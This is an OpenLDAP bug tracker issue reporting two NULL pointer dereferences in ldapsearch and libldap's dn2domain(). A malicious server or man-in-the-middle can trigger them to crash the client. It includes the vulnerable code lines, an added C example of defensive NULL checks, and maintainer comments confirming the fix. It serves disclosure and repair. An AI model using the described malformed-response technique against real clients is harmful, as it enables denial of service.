Issue 8842 - NULL pointer dereference
Summary: NULL pointer dereference
Status: VERIFIED FIXED
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd (show other issues)
Version: unspecified
Hardware: All All
Target Milestone: ---
Assignee: OpenLDAP project
Reported: 2018-05-01 20:14 UTC by openldap@katzen.cc
Modified: 2018-12-19 17:22 UTC (History)
Description openldap@katzen.cc 2018-05-01 20:14:50 UTC
Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or mitm attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simple DoS.


./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
	case LDAP_RES_INTERMEDIATE:
		npartial++;
		ldap_parse_intermediate( ld, msg,
			&retoid, &retdata, NULL, 0 );
		nresponses_psearch = 0;
		if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is
called.

Another NULL pointer dereference caused by a bad response:


./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);
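Added example (not the reporter's code and not the fix from the its8842 branch): a small C model of the two checks a client needs for the cases above, namely a NULL retoid from ldap_parse_intermediate() and a NULL la_value.bv_val reaching memcpy() in dn2domain(). The berval/ldap_ava structs, is_sync_info() and dn2domain_safe() are constructed stand-ins for the libldap code paths, not the library's own API.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed stand-ins for libldap's struct berval / LDAPAVA, not the real headers. */
struct berval { size_t bv_len; char *bv_val; };
struct ldap_ava { struct berval la_attr; struct berval la_value; };
#define LDAP_SYNC_INFO "1.3.6.1.4.1.4203.1.9.1.4"   /* RFC 4533 Sync Info OID */

/* First bug: responseName is OPTIONAL in an intermediate response, so the parsed
 * retoid may be NULL; treat that as "not sync info" instead of calling strcmp(). */
int is_sync_info(const char *retoid)
{
    return retoid != NULL && strcmp(retoid, LDAP_SYNC_INFO) == 0;
}

/* Second bug: dn2domain() copied ava->la_value.bv_val unchecked. This model builds
 * "example.com" from dc= AVAs in DN order and fails closed (-1) on a NULL attribute
 * or value, a non-dc attribute, or an output buffer that is too small. */
int dn2domain_safe(const struct ldap_ava *avas, size_t n, char *out, size_t outlen)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        const struct berval *at = &avas[i].la_attr, *val = &avas[i].la_value;
        if (at->bv_val == NULL || val->bv_val == NULL)          /* the ITS#8842 crash case */
            return -1;
        if (at->bv_len != 2 || strncasecmp(at->bv_val, "dc", 2) != 0)
            return -1;
        size_t need = val->bv_len + (i ? 1 : 0);                /* value plus '.' separator */
        if (used + need + 1 > outlen)                            /* +1 for the NUL terminator */
            return -1;
        if (i) out[used++] = '.';
        memcpy(out + used, val->bv_val, val->bv_len);            /* bv_val verified non-NULL */
        used += val->bv_len;
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    struct ldap_ava dn[2] = { { {2, "dc"}, {7, "example"} }, { {2, "dc"}, {3, "com"} } };
    struct ldap_ava bad[1] = { { {2, "dc"}, {0, NULL} } };      /* value absent from response */
    char buf[64];
    int rc = dn2domain_safe(dn, 2, buf, sizeof buf);
    printf("is_sync_info(NULL) = %d\n", is_sync_info(NULL));
    printf("dn2domain_safe(dn) = %d, domain = %s\n", rc, buf);
    printf("dn2domain_safe(bad) = %d\n", dn2domain_safe(bad, 1, buf, sizeof buf));
    return 0;
}
```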
Comment 1 Ondřej Kuzník 2018-06-21 15:29:24 UTC
On Tue, May 01, 2018 at 08:14:50PM +0000, openldap@katzen.cc wrote:
> 2 small issues:
> I'm keeping it brief, let me know if you need more information.
> 
> A malicious LDAP server or mitm attacker can craft a response that causes the
> ldap client to crash. Nothing critical, just a simple DoS.
> [...]
> The problem here is that retoid can be NULL after ldap_parse_intermediate() is
> called. 
>
> Another NULL pointer dereference caused by a bad response:
> [...]
> The PoC leads to memcpy being called with a NULL pointer as second argument
> (ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):
> 
> AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);

Both are fixed in this branch:
https://github.com/mistotebe/openldap/tree/its8842

-- 
Ondřej Kuzník
Senior Software Engineer
Symas Corporation                       http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP

Comment 2 Quanah Gibson-Mount 2018-07-09 17:06:24 UTC
changed notes
changed state Open to Test
moved from Incoming to Software Bugs
Comment 3 Quanah Gibson-Mount 2018-07-10 13:59:34 UTC
changed notes
changed state Test to Release
Comment 4 OpenLDAP project 2018-12-19 17:22:17 UTC
Fixed in master
Fixed in RE24 (2.4.47)
Comment 5 Quanah Gibson-Mount 2018-12-19 17:22:17 UTC
changed notes
changed state Release to Closed